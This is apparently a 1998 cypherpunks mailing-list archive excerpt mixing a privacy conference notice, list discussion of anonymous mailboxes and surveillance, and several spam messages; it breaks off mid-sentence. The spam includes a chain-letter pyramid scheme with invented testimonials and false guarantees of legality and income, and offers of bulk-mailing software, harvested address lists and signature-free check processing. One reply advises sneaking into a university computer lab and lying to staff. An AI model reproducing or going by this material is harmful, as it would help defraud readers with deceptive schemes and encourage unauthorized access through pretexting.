     and Privacy Sourcebook.

   o Receive Continuing Legal Education Credits (CLE).


THE PANELS

   o Top U.S. government officials will debate top industry
     representatives on current U.S. policy on domestic restrictions,
     export controls, and pending legislation.

   o A panel of senior government officials from France, England,
     Canada, Germany and the European Union will describe encryption
     policies in their countries and future trends.

   o Leading cryptographers and technical experts will discuss the
     dangers and benefits of key escrow and key recovery systems and
     other important technical issues.

   o Attorneys representing the plaintiffs and the U.S. Government in
     the pending legal challenges to the constitutionality of export
     controls will discuss and debate the cases and their outcomes.


FEES:

Register before May 15 for reduced fee.

   Standard

       o $300.00 (before May 15) / $400.00 (after May 15)

   Academic/Govt/501(c)(3)

       o $150.00 (before May 15) / $200.00 (after May 15)


MORE INFORMATION, FULL AGENDA AND ONLINE REGISTRATION:

     http://www.epic.org/events/crypto98/

-------
David Banisar (Banisar@epic.org)                *    202-544-9240 (tel)
Electronic Privacy Information Center           *    202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301             *    HTTP://www.epic.org
Washington, DC 20003 * PGP Key  http://www.epic.org/staff/banisar/key.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 36997526@giselp.com
Date: Wed, 20 May 1998 01:29:10 -0700 (PDT)
To: Friend@public.com
Subject: Secrets To Losing Weight Right Now and Keeping It Off Forever!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
Are You Serious About Losing Weight Right Now?
If you are, please continue.
If not, we apologize for the intrusion.

You can slim down right now using Five Simple Techniques taught by experts around the world.

It's been tested and guaranteed effective 98.2% to work with just about anyone.  It doesn't matter who you are or if you have dieted and failed before.  This program is 100% guaranteed.  It's safe for anyone, and any age.

Imagine,  getting down to that perfect dress size, or fitting into those jeans that just don't want to go on anymore.

You can lose those unwanted pounds right now without the use of:

	Expensive Diet Pills
	Awful Tasting Diet Shakes
	or, just plain starving yourself.
	And best of all, It's perfectly safe!


Summer is almost here. So say goodbye to YoYo Diets forever.

It's time to start a new You!

For Free Information on shaving those unwanted pounds safely, email us at:
weightloss@giselp.com

We guarantee you'll have a new attitude!

Please pardon our intrusion.  To be removed, Click reply and type "Remove" in Subject box and you will be permanently removed from any future mailings.


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: corvett52@yahoo.com
Date: Mon, 25 May 1998 13:08:13 -0700 (PDT)
To: Friend@public.com
Subject: The Internet Success ToolBox
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Note:We do not wish to send e-mail to anyone that does
not want it so please send an e-mail to:
corvett54@yahoo.com
You will be removed promptly.
*****************************************************************

"THE INTERNET SUCCESS TOOLBOX"
The Most Complete Marketing Software Package Available Anywhere!

This is what you will receive on  CD-ROM:

1. Stealth Mass Mailer ($399.00 value) - This unique, first of 
it's kind - software that allows you to easily send 250,000 e-mail 
messages an hour. Simply enough by making a single 
connection to the Internet using a standard modem, and connecting to
either 20 different mail servers, or a single mail server 20 times.

This, easy to use, software is designed for the basic computer 
user to understand. It's as easy as imputing the mail server, 
selecting the list of e-mail recipients to send to, inserting your 
e-mail address, adding your subject line, selecting your sales 
letter, and pressing send.

2. E-Mail Pro Extractor ($350.00 value) - This one of a kind software 
program is designed to manage and clean up any list of e-mail
addresses. It will purge duplicates, manage removes and delete
undeliverables. It will also separate and categorize your list of 
e-mail addresses by domain names.

The E-mail Pro Version 4.0 Bulk E-mail Loader also imports simple
text files that anyone can download from AOL, CompuServe, the
Internet, etc...These text files contain classified ads, forum 
messages, or data from the member directory. Each of these 
files are filled with e-mail addresses.

3. Check Deposit System ($125.00 value) - Check Deposit System 
Version 2.1 is a state of the art, revolutionary software that allows
you to easily and legally process checks by fax, phone or Internet.
The customer's signature on the check is not necessary. 

4. 16 Million E-mail Addresses ($149.00 value) - We took a total of 
over 92 million e-mail addresses from many of the touted CD's that 
are out there (bought them all - some were $300+)! We added the 
millions we had in storage to those. When we combined them all, 
we had in excess of 100+ million addresses in one huge file.

We then ran a super "sort/de-dupe" program against this 
huge list. It cut the file down to less than 25 million!! 

We then ran a program that contained 150+ keywords to 
remove addresses with vulgarity, profanity, sex-related 
names, postmaster, webmaster, flamer, abuse, spam, 
etc...Also we  eliminated all .edu, .mil., org., gov., etc...
After that list was run against the remaining list, it
reduced it down to near 16 million addresses!

So, you see, our list will save people hundreds of 
dollars buying all others that are out there on  CD. Using
ours will be like using the 100+ million that we started with, 
but a lot less money and a lot less time!

If you order "The Internet Success Toolbox" for $395.00
within the next 7 days, you'll also receive the following 
awesome bonuses absolutely FREE. 
A value of over $600.00 !!!

To order: 

____ YES!  I'm bursting with anticipation!  Please send me "The 
Internet Success Toolbox" so I can start advertising my business to 
"millions of people" - absolutely FREE!  I'm anxious to see how others 
are creating immediate "cash-flow explosions", and eliminating most of  
their advertising and marketing costs - and how I can do the same!  
Enclosed is $395.

____ YES AGAIN!  Because I'm responding within 7 days, I will receive 
6 BONUSES with a total value of $663.90 - absolutely FREE!  They include: 

BONUS #1 ($39 value): "Search Engine Secrets" - Discover the Most 
Powerful and Proven Strategies that really work to place you at the Top of
the Search Engines!

BONUS #2 ($195 value): A FREE one year subcription to "The Internet
Success Toolbox Newsletter" - my ticket to marketing and 
internet cash flow heaven!  

BONUS #3 ($39.95 value): Your Hotline List of "7000 Free Classified 
Ad Sites on the Internet" - a virtual GOLDMINE!  

BONUS #4 ($19.95 value): A FREE Special Report titled "How to Put Your 
Business on Automatic Pilot and Turn Your Marketing System Into a 
Predictable, Turnkey, Cash-Flow Machine That Keeps on Working - Even 
When You Don't!!"  
									
BONUS #5 ($195 value): Unlimited technical support.  Even though 
"The Internet Success Toolbox"  will be simple to use, it's great to 
know support is always available - if and when you really need it!  
And last but not least . . . .

BONUS #6 ($175 value): Order within 7 days and I'll also throw in a 
FREE VACATION CERTIFICATE good for 3 days and 2 nights of FREE 
lodging at one of over 30 "premier" resorts.

Some vacation spots you can choose from include: Hawaii; Orlando, 
FL; Las Vegas; Atlantic City; Palm Springs; Aruba - in the South Carribean;
Cancun, Mexico; and many, many more!

Hey, when you start making a TON of money, you'll wanna do some 
celebrating, won't you? So start packing those bags!

That's it. A lot more than you bargained for isn't it?

When you total all the goodies up, you're looking as a total value of 
$663.90! All yours - absolutely FREE - with your purchase of our amazing
 package  "The Internet Success Toolbox " for only $395.00.

And I'll even pay for shipping your package. You can have it in days. And 
start making money THE VERY SAME DAY!

Anyway, I have a copy right here on my desk reserved for you. All I need 
is your go ahead and I'll rush it out to you along with your 6 FREE BONUSES.	

___Yes, Also send me info on obtaining a Merchant Account so that I can take
credit cards for my business.

___I am interested in becoming a re-seller for your company. Please send 
re-seller information.
							

 Name _____________________________________________________

Street Address ____________________________________________

City)__________________State_______Zip_____________


Phone # (_____) ___________________________  

Fax # (______) _____________________

E-mail Address _________________________


___Visa  ___MasterCard

Total:$________

Account Number_____________________

Expiration Date____________________


I understand that all sales are final.


____________________________________
           Signature


To order by check:
***********************************************************

Tape or paste your check here
Fax it to us at: (425)379-9722
You do not need to send a hard copy of your check.
The fax is all we need.

(We are able to perform this service using our
Check Deposit System Software)

************************************************************


* Orders by Credit Card are shipped IMMEDIATELY.
  Fax completed order form to: (425) 379-9722

* Orders by personal, business or credit card CHECK are shipped in 7-10 
  business days.

* Orders MAILED IN or OVERNIGHTED with CASHIER'S CHECK  or MONEY ORDER are
  shipped IMMEDIATELY. Mail to: 
                       SYS
                       11014 19th Ave SE Suite 305 
                       Everett, WA 98208.
    
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 


									





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: global8888@yahoo.com
Date: Mon, 25 May 1998 21:02:11 -0700 (PDT)
To: Friend@public.com
Subject: The Internet Success ToolBox
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Note:We do not wish to send e-mail to anyone that does
not want it so please send an e-mail to:
global8889@yahoo.com
You will be removed promptly.
*****************************************************************

"THE INTERNET SUCCESS TOOLBOX"
The Most Complete Marketing Software Package Available Anywhere!

This is what you will receive on  CD-ROM:

1. Stealth Mass Mailer ($399.00 value) - This unique, first of 
it's kind - software that allows you to easily send 250,000 e-mail 
messages an hour. Simply enough by making a single 
connection to the Internet using a standard modem, and connecting to
either 20 different mail servers, or a single mail server 20 times.

This, easy to use, software is designed for the basic computer 
user to understand. It's as easy as imputing the mail server, 
selecting the list of e-mail recipients to send to, inserting your 
e-mail address, adding your subject line, selecting your sales 
letter, and pressing send.

2. E-Mail Pro Extractor ($350.00 value) - This one of a kind software 
program is designed to manage and clean up any list of e-mail
addresses. It will purge duplicates, manage removes and delete
undeliverables. It will also separate and categorize your list of 
e-mail addresses by domain names.

The E-mail Pro Version 4.0 Bulk E-mail Loader also imports simple
text files that anyone can download from AOL, CompuServe, the
Internet, etc...These text files contain classified ads, forum 
messages, or data from the member directory. Each of these 
files are filled with e-mail addresses.

3. Check Deposit System ($125.00 value) - Check Deposit System 
Version 2.1 is a state of the art, revolutionary software that allows
you to easily and legally process checks by fax, phone or Internet.
The customer's signature on the check is not necessary. 

4. 16 Million E-mail Addresses ($149.00 value) - We took a total of 
over 92 million e-mail addresses from many of the touted CD's that 
are out there (bought them all - some were $300+)! We added the 
millions we had in storage to those. When we combined them all, 
we had in excess of 100+ million addresses in one huge file.

We then ran a super "sort/de-dupe" program against this 
huge list. It cut the file down to less than 25 million!! 

We then ran a program that contained 150+ keywords to 
remove addresses with vulgarity, profanity, sex-related 
names, postmaster, webmaster, flamer, abuse, spam, 
etc...Also we  eliminated all .edu, .mil., org., gov., etc...
After that list was run against the remaining list, it
reduced it down to near 16 million addresses!

So, you see, our list will save people hundreds of 
dollars buying all others that are out there on  CD. Using
ours will be like using the 100+ million that we started with, 
but a lot less money and a lot less time!

If you order "The Internet Success Toolbox" for $395.00
within the next 7 days, you'll also receive the following 
awesome bonuses absolutely FREE. 
A value of over $600.00 !!!

To order: 

____ YES!  I'm bursting with anticipation!  Please send me "The 
Internet Success Toolbox" so I can start advertising my business to 
"millions of people" - absolutely FREE!  I'm anxious to see how others 
are creating immediate "cash-flow explosions", and eliminating most of  
their advertising and marketing costs - and how I can do the same!  
Enclosed is $395.

____ YES AGAIN!  Because I'm responding within 7 days, I will receive 
6 BONUSES with a total value of $663.90 - absolutely FREE!  They include: 

BONUS #1 ($39 value): "Search Engine Secrets" - Discover the Most 
Powerful and Proven Strategies that really work to place you at the Top of
the Search Engines!

BONUS #2 ($195 value): A FREE one year subcription to "The Internet
Success Toolbox Newsletter" - my ticket to marketing and 
internet cash flow heaven!  

BONUS #3 ($39.95 value): Your Hotline List of "7000 Free Classified 
Ad Sites on the Internet" - a virtual GOLDMINE!  

BONUS #4 ($19.95 value): A FREE Special Report titled "How to Put Your 
Business on Automatic Pilot and Turn Your Marketing System Into a 
Predictable, Turnkey, Cash-Flow Machine That Keeps on Working - Even 
When You Don't!!"  
									
BONUS #5 ($195 value): Unlimited technical support.  Even though 
"The Internet Success Toolbox"  will be simple to use, it's great to 
know support is always available - if and when you really need it!  
And last but not least . . . .

BONUS #6 ($175 value): Order within 7 days and I'll also throw in a 
FREE VACATION CERTIFICATE good for 3 days and 2 nights of FREE 
lodging at one of over 30 "premier" resorts.

Some vacation spots you can choose from include: Hawaii; Orlando, 
FL; Las Vegas; Atlantic City; Palm Springs; Aruba - in the South Carribean;
Cancun, Mexico; and many, many more!

Hey, when you start making a TON of money, you'll wanna do some 
celebrating, won't you? So start packing those bags!

That's it. A lot more than you bargained for isn't it?

When you total all the goodies up, you're looking as a total value of 
$663.90! All yours - absolutely FREE - with your purchase of our amazing
 package  "The Internet Success Toolbox " for only $395.00.

And I'll even pay for shipping your package. You can have it in days. And 
start making money THE VERY SAME DAY!

Anyway, I have a copy right here on my desk reserved for you. All I need 
is your go ahead and I'll rush it out to you along with your 6 FREE BONUSES.	

___Yes, Also send me info on obtaining a Merchant Account so that I can take
credit cards for my business.

___I am interested in becoming a re-seller for your company. Please send 
re-seller information.
							

 Name _____________________________________________________

Street Address ____________________________________________

City)__________________State_______Zip_____________


Phone # (_____) ___________________________  

Fax # (______) _____________________

E-mail Address _________________________


___Visa  ___MasterCard

Total:$________

Account Number_____________________

Expiration Date____________________


I understand that all sales are final.


____________________________________
           Signature


To order by check:
***********************************************************

Tape or paste your check here
Fax it to us at: (425)379-9722
You do not need to send a hard copy of your check.
The fax is all we need.

(We are able to perform this service using our
Check Deposit System Software)

************************************************************


* Orders by Credit Card are shipped IMMEDIATELY.
  Fax completed order form to: (425) 379-9722

* Orders by personal, business or credit card CHECK are shipped in 7-10 
  business days.

* Orders MAILED IN or OVERNIGHTED with CASHIER'S CHECK  or MONEY ORDER are
  shipped IMMEDIATELY. Mail to: 
                       SYS
                       11014 19th Ave SE Suite 305 
                       Everett, WA 98208.
    
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 


									





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: waconsult@yahoo.com
Date: Sun, 31 May 1998 21:24:26 -0700 (PDT)
To: u@public.com
Subject: 4 U
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Hello there,


I make a habit of deleting mail I have not yet read, as I'm
sure you do also. Please read this one though, you might
find this interesting.

"I recently lost my high paying job from a major computer
corporation due to their loss of a major contract. They
messed up, but that whole department of 15 people including
myself are hung out to dry. Corporate America at it's
finest. I have not had luck yet finding another job, as my
skills were very specific to that company and not really
worth anything to another company.

During the time I worked there, I also bought and sold real
estate like those guys on TV. (yes, you can do that and make
it work for you too) The key is I made it work. I was fairly
successful until the 'Nightmare on Pleasant St.' as my
friends and I call it ... I lost most of my money in that
one bad deal and I was no longer financially secure and I
relied heavily on my income from my FORMER JOB.

As you've already heard, I lost that too and I started to
look for other things I could make money to help me get back
on my feet. So, I started to read all of the JUNK that
people have mailed to me. Let me tell you, I can't believe
some of the things out there ... what a waste of time.

Until I saw this. Hold on.

I know you are (like I was) ready to stop reading right here
 I implore you not to. I (like you) am NOT some non-educated
fool. I have made much money for myself in Real Estate,
which is not an easy business. I am a rather competent
business man.

At least finish reading this until the end.
BETTER STILL: PRINT THIS LETTER AND READ IT IN COMFORT OVER,
AND OVER.

Here is what I saw ... 
* I only needed $20 extra dollars to try this
* this is making money for people who at least tried a
little, so why not me too?

In desperation, I sent the four 5 dollar bills and got the
reports. As I always have, I MADE this work for me too. I
took much time and effort to learn about e-mail (which is a
great and FREE tool!!) and how to send lots of it.

19 days after my first mailing of this, I have received
roughly 8,450 responses. (trust me, when my fiance` saw
8,450 five dollar bills on the kitchen table, she no longer
laughed at me for trying this)" Matthew of Basqiuat in
Evanston, IL wrote.

Here is a special offer to help you. When you order any of
the reports from EDHAY, PO BOX 13511, Sacramento CA 95815
or as long as the above address is on the address list
below, you will receive the step-by-step instructions on
HOW YOU CAN MAKE $250,000 THROUGH THIS PROGRAM in addition
to 10,000 e-mail addresses to start e-mailing your offers
immediately. It took some time and expense to put this
together so please add another $5 for handling the addresses
and the instructions. They will come to you in a .txt format.
You will get the list of addresses and instructions with
your report.

If you follow the directions in this e-mail and be prepared
to eventually set aside about an hour each day to follow up
(and count your money!), you will make it. You don't need to
be a computer whiz, but I'll bet you already are. If you can
open an envelope, remove the money, and send an e-mail
message, then you're on your way to the bank. Take the time
to read this so you'll understand how easy it is. If I can
do this, so can you!

SAVE THIS E-MAIL IN A FOLDER OF YOUR CHOICE BY CLICKING ON
'Save As' IN THE 'File' MENUE AT THE TOP LEFT CORNER OF THIS
WINDOW. GIVE IT AN APPROPRIATE FILE NAME AND CHOOSE 'Plain
Text' AS THE FILE TYPE FORMAT. THAT WAY, YOU WILL HAVE A
COPY OF THIS FOR FUTURE USE.

This is a LEGAL, MONEY-MAKING PHENOMENON.
PRINT this letter, read the directions, THEN READ IT
AGAIN!!!

You are about to embark on the most profitable and unique
program you may ever see. Many times over, it has demonstrated
and proven its ability to generate large amounts of cash. This
program is showing fantastic appeal with a huge and
ever-growing on-line population desirous of additional income.

This is a legitimate, LEGAL, money-making opportunity. It
does not require you to come in contact with people, do any
hard work, and best of all, you never have to leave the
house, except to get the mail and go to the bank!

This truly is that lucky break you've been waiting for!
Simply follow the easy instructions in this letter, and your
financial dreams will come true! When followed correctly,
this electronic, multi-level marketing program works
perfectly ... 100% EVERY TIME!

Thousands of people have used this program to:
   - Raise capital to start their own business
   - Pay off debts
   - Buy homes, cars, etc.,
   - Even retire!

This is your chance, so don't pass it up!


GO FOR IT NOW!
Ed Hay





******* P R O G R A M   O V E R V I E W *******

Basically, this is what we do:
We send thousands of people a product for $5.00 that costs
next to nothing to produce and e-mail. As with all
multi-level businesses, we build our business by recruiting
new partners and selling our products. Every state in the
U.S. allows you to recruit new business online (via your
computer).

The products in this program are a series of four business
and financial reports costing $5.00 each. Each order you
receive via "snail mail" will include:
  * $5.00 cash
  * The name and number of the report they are ordering
  * The e-mail address where you will e-mail them the report
they ordered

To fill each order, you simply e-mail the product to the
buyer. THAT'S IT! The $5.00 is yours! This is the EASIEST
electronic business anywhere!

FOLLOW THE INSTRUCTIONS TO THE LETTER AND BE PREPARED TO
REAP THE STAGGERING BENEFITS!



******* I N S T R U C T I O N S *******

This is what you MUST do:

1. Order all 4 reports shown on the list below (you can't
sell them if you don't order them):
   * For each report, send $5.00 CASH, the NAME & NUMBER OF
THE REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR
RETURN POSTAL ADDRESS (in case of a problem) to the person
whose name appears on the list next to the report.
   * When you place your order, make sure you order each of
the four reports. You will need all four reports so that you
can save them on your computer and resell them.
   * Within a few days you will receive, via e-mail, each of
the four reports. Save them on your computer so they will be
accessible for you to send reports to the 1,000's of people
who will order them from you.

2. IMPORTANT-- DO NOT alter the names of the people who are
listed next to each report, or their sequence on the list,
in any way other than is instructed below in steps "a"
through "e" or you will lose out on the majority of your
profits. Once you understand the way this works, you'll
also see how it doesn't work if you change it. Remember,
this method has been tested, and if you alter it, it will
not work.
   a. Look below for the listing of available reports.
   b. After you've ordered the four reports, replace the
name and address under REPORT #1 with your name and address,
moving the one that was there down to REPORT #2.
   c. Move the name and address that was under REPORT #2
down to REPORT #3.
   d. Move the name and address that was under REPORT #3
down to REPORT #4. The name and address that was under
REPORT #4 is removed from the list and has NO DOUBT
collected their 50 grand.
   e. Please make sure you copy everyone's name and address
ACCURATELY!!!

3. Take this entire letter, including the modified list of
names, and save it to your computer. Make NO changes to the
instruction portion of this letter.

4. Now you're ready to start an e-mail campaign on the World
Wide Web! E-mailing is very, very inexpensive. You can buy
e-mail lists for under $20/2,000 addresses or you can pay
someone a minimal charge to take care of it for you. For
additional $5, you will receive 10,000 e-mail addresses and
the step-by-step instructions on HOW YOU CAN MAKE $250,000
through this program when you order any of the reports from
me, EDHAY, PO BOX 13511, Sacramento CA 95815. START YOUR
E-MAIL CAMPAIGN IMMEDIATELY!

5. For every $5.00 you receive from interested participants,
all you must do is e-mail them the report they ordered.
THAT'S IT! ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS!
This will guarantee that the e-mail THEY send out, with YOUR
name and address on it, will be prompt because they can't
send their e-mails until they receive the reports!



******* R E P O R T S *******

Notes:
- ALWAYS SEND $5 CASH FOR EACH REPORT
- Order Each REPORT by NUMBER and NAME
- ALWAYS SEND YOUR ORDER VIA REGULAR MAIL
- Make sure the cash is concealed by wrapping it in at least
two sheets of paper
- On one of those sheets of paper, include: (a)the number &
name of the report you are ordering, (b)your e-mail address,
and (c)your postal address.

______________________________________________
REPORT #1 "HOW TO REORGANIZE YOUR TIME TO ACCOMIDATE A HOME
BASED BUSINESS"
 
ORDER REPORT #1 FROM:
       WA Consult
       2511 S Illinois Ave, Suite 35
       Carbondale, IL 62901
______________________________________________
REPORT #2 "MAJOR CORPORATIONS AND E-MAIL"

ORDER REPORT #2 FROM:
       EDHAY
       PO BOX 13511
       Sacramento, CA 95853
______________________________________________
REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"

ORDER REPORT #3 FROM:
       SMINC
       1435 Warner Street, Suite 8
       Chico, CA 95926
______________________________________________
REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS"

ORDER REPORT #4 FROM:
       Basqiuat
       PO BOX 1663
       Evanston, IL 60205
______________________________________________




******* H O W   D O E S   I T   W O R K ? *******

Let's say you decide to start small just to see how well it
works. Assume your goal is to get 10 people to participate on
your first level. (Placing a lot of FREE ads on the internet
will EASILY get a larger response.) Also assume that everyone
else in YOUR ORGANIZATION gets ONLY 10 downline members.
Follow this example to achieve the STAGGERING results below.

1st level--your 10 members with $5.........................$50
2nd level--10 members from those 10 ($5 x 100)............$500
3rd level--10 members from those 100 ($5 x 1,000).......$5,000
4th level--10 members from those 1,000 ($5 x 10,000)...$50,000
--------------------------------------------------------------
A TOTAL OF.............................................$55,550
--------------------------------------------------------------

Remember friends, this assumes that the people who participate
only recruit 10 people each. Think for a moment what would
happen if they got 20 people to participate! Most people get
100's of participants! THINK ABOUT IT! Your cost to
participate in this is practically nothing (surely you can
afford $20). You obviously already have an internet connection
and e-mail is FREE!!! REPORT#3 shows you the most productive
methods for bulk e-mailing and purchasing e-mail lists. Some
list & bulk e-mail vendors even work on trade!

About 50,000 new people get online every month!



******* T I P S   F O R   S U C C E S S *******

 * TREAT THIS AS YOUR BUSINESS! Be prompt, professional, and
follow the directions accurately.
 * Send for the four reports IMMEDIATELY so you will have them
when the orders start coming in because when you receive a
$5 order, you MUST send out the requested product/report to
comply with the U.S. Postal & Lottery Laws, Title 18,Sections
1302 and 1341 or Title 18, Section 3005 in the U.S. Code, also
Code of Federal Regs. Vol. 16, Sections 255 and 436, which
state that 'a product or service must be exchanged for money
received.'
 * ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.
 * Be patient and persistent with this program. If you follow
the instructions exactly, the results WILL undoubtedly be
SUCCESSFUL!
 * ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED




******* S U C C E S S   G U I D E L I N E *******

Follow these guidelines to guarantee your success:
 * If you don't receive 10 to 20 orders for REPORT #1 within
two weeks, continue advertising until you do.
 * Then, a couple of weeks later you should receive at least
100 orders for REPORT #2. If you don't, continue advertising
until you do.
 * Once you have received 100 or more orders for REPORT #2,
YOU CAN RELAX, because the system is already working for you,
and the cash will continue to roll in!

THIS IS IMPORTANT TO REMEMBER:
Every time your name is moved down on the list, you are placed
in front of a DIFFERENT report. You can KEEP TRACK of your
PROGRESS by watching which report people are ordering from you
 If you want to generate more income, send another batch of
e-mails and start the whole process again! There is no limit
to the income you will generate from this business!

NOTE:
If you need help with starting a business, registering a
business name, how income tax is handled, etc., contact your
local office of the Small Business Administrations (a Federal
agency) for free help and answer to questions. Also, the
Internal Revenue Service offers free help via telephone and
free seminars about business taxes.



******* T E S T I M O N I A L S *******

______________________________________________


This program does work, but you must follow it EXACTLY!
Especially the rule of not trying to place your name in a
different position, it won't work and you'll lose a lot of
potential income. I'm living proof that it works. It really is
a great opportunity to make relatively easy money, with little
cost to you. If you do choose to participate, follow the
program exactly, and you'll be on your way to financial
security.

Sean McLaughlin, Jackson, MS
______________________________________________


My name is Frank. My wife, Doris, and I live in Bel-Air, MD.
I am a cost accountant with a major U.S. Corporation and I
make pretty good money. When I received the program I grumbled
to Doris about receiving "junk mail." I made fun of the whole
thing, spouting my knowledge of the population and percentages
involved. I "knew" it wouldn't work. Doris totally ignored my
supposed intelligence and jumped in with both feet. I made
merciless fun of her, and was ready to lay the old "I told you
so" on her when the thing didn't work ... well, the laugh was
on me! Within two weeks she had received over 50 responses.
Within 45 days she had received over $147,200 in $5 bills! I
was shocked! I was sure that I had it all figured and that it
wouldn't work. I AM a believer now. I have joined Doris in her
"hobby." I did have seven more years until retirement, but I
think of the "rat race" and it's not for me. We owe it all to
MLM.

Frank T., Bel-Air, MD
______________________________________________


The main reason for this letter is to convince you that this
system is honest, lawful, extremely profitable, and is a way
to get a large amount of money in a short time. I was
approached several times before I checked this out. I joined
just to see what one could expect in return for the minimal
effort and money required. To my astonishment, I received
$36,470.00 in the first 14 weeks, with money still coming in.

Sincerely yours, Phillip A. Brown, Esq.
______________________________________________


Not being the gambling type, it took me several weeks to make
up my mind to participate in this plan. But conservative that
I am, I decided that the initial investment was so little that
there was just no way that I wouldn't get enough orders to at
least get my money back. Boy, was I surprised when I found my
medium-size post office box crammed with orders! For awhile,
it got so overloaded that I had to start picking up my mail at
the window. I'll make more money this year than any 10 years
of my life before. The nice thing about this deal is that it
doesn't matter where in the U.S. the people live. There simply
 isn't a better investment with a faster return.

Mary Rockland, Lansing, MI
______________________________________________


I had received this program before. I deleted it, but later I
wondered if I shouldn't have given it a try. Of course, I had
no idea who to contact to get another copy, so I had to wait
until I was e-mailed another program ... 11 months passed then
it came ... I didn't delete this one! ... I made more than
$41,000 on the first try!!

D. Wilburn, Muncie, IN
______________________________________________


This is my third time to participate in this plan. We have
quit our jobs, and will soon buy a home on the beach and live
off the interest on our money. The only way on earth that this
plan will work for you is if you do it. For your sake, and for
your family's sake don't pass up this golden opportunity. Good
luck and happy spending!

Charles Fairchild, Spokane, WA
______________________________________________


ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR ROAD TO
FINANCIAL FREEDOM!!!


If you are not interested, we apologize for the intrusion.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Interstate 95 <I95@nym.alias.net>
Date: Mon, 1 Jun 1998 08:19:55 +0800
To: <cypherpunks@Algebra.COM>
Subject: Re: Lack of net access blows:
Message-ID: <19980601001615.23933.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 28 May 1998, Nalus Optic wrote:

> 
> Cyberpunks,
> 	
> 	Que pasa?  My name is D and I am new to the list...I will most
> likely just be lurking for a while, till I get a visit from the Duel
> Pentium II 266, 128megs of RAM, running Linux on one PII and Win98 on the
> Other Fariy...She should be along by the end of the summer...

You mean one machine with dual processors? You can't run two operating
systems concurrently on an SMP machine. You can install two operating
systems and choose which one to run, of course. 

> 	Anywhoo, the point of the subject is that at this point and time
> I don't have net access so I was hopeing someone out there would send me
> the FAQ that is talked of in the welcome message.  It can be found at:
> 
> 	anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt
> 
> 	At least I think that is where it is at...
> 
> 	I thank who ever is nice enough to send it to me...Also, maybe
> post a message to me as soon as you send it...That way I don't end up
> with like all of you sending it and Juno kicking my ass again for
> flooding there box.

This is complicated by the fact that there are several FAQs in that
directory. One, combined, is 100K. Juno has a message limit of around 64K,
meaning that the FAQ would have to be split, and I don't know what the
upper limit is on the size of a mailspool at Juno. 

My suggestion is to sneak into a public university computer lab, sit down
at a machine then FTP it and put it on a floppy. Most of the people in
these labs don't ask questions because getting carded tends to really tick
the students off. If they do, say you left your ID card in your car, that
you're very sorry, that you usually don't get asked for it when you walk
in, that you're taking <professor's name> <name of one of his CS classes>
class, that you only need about 5 minutes of time, and that you'll
remember it next time. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 8 Jun 1998 03:59:22 +0800
To: Sprokkit Amhal <sprokkit@hotmail.com>
Subject: Re: anonymous mailboxes
In-Reply-To: <19980604193606.27765.qmail@hotmail.com>
Message-ID: <3.0.5.32.19980607021342.008b1370@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>On Thu, 4 Jun 1998, Sprokkit Amhal wrote:
>> anonymous email boxes, whereby a user can receive email and even a 
>> traffic analysis attacker is unable to glean information about who 
>> received what when.  I forget exactly what ve called vis method...

One way to do pseudonymous email boxes is to use a web-based
mailbox server such as hotmail and pick up the mail through
anonymizers or onion routers.  Obviously you need SSL for the
anonymizer connections, and for the mailbox connection as well,
and the name of the mailbox needs to be in the encrypted portion
of the SSL requests rather than in the sniffable URL parts.
The main threat is eavesdroppers watching the anonymizers
over a period of time, picking up patterns that may not show
during a single mail pickup.  So you need enough anonymizers out there, 
or enough cover traffic on a smaller number of anonymizers, 
but it should basically be doable.

It also helps if you can send mail to the mailer using the web,
with SSL and chains of anonymizers to do it, to protect the sender,
but anonymous remailers can also solve that problem.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 15 Jun 1998 02:33:19 +0800
To: John Young <cypherpunks@Algebra.COM
Subject: Re: Childlove and Feds
In-Reply-To: <1.5.4.32.19980614150621.006a81f4@pop.pipeline.com>
Message-ID: <v03130301b1a9c43aaa72@[209.133.20.9]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:06 AM -0700 6/14/98, John Young wrote:

>Not all Feds and phreakers agree that pedophobic Feds
>and teeny-cute phreaks help society, although the pedophilic
>Agency allegedly abusing the adorable phreaker for its
>come-on entrapment had "no comment" to its online
>childlove racketeering and profiteering, sort of like the
>NYT's art spiegel comic today.

I was scanning the dial on my shortwave radio recently and landed on Radio
Havana. I was thinking about how in many countries (presumably including
Cuba)  it's a thought crime to tune in to banned broadcasts.

And we in the West unctuously decry this.

But are we all that different?

Suppose "Radio Pedophilia" started broadcasting on 6223 KHz. Fill in the
details on program content, etc.

By any reading of the various child pornography laws in the U.S. merely
_listening_ to such a broadcast would be a felony. Of this this there can
be no doubt.

Were such a station to exist (which it does not), I would expect FCC and
FBI, with NSA SIGINT assistance, would use technical means to isolate who
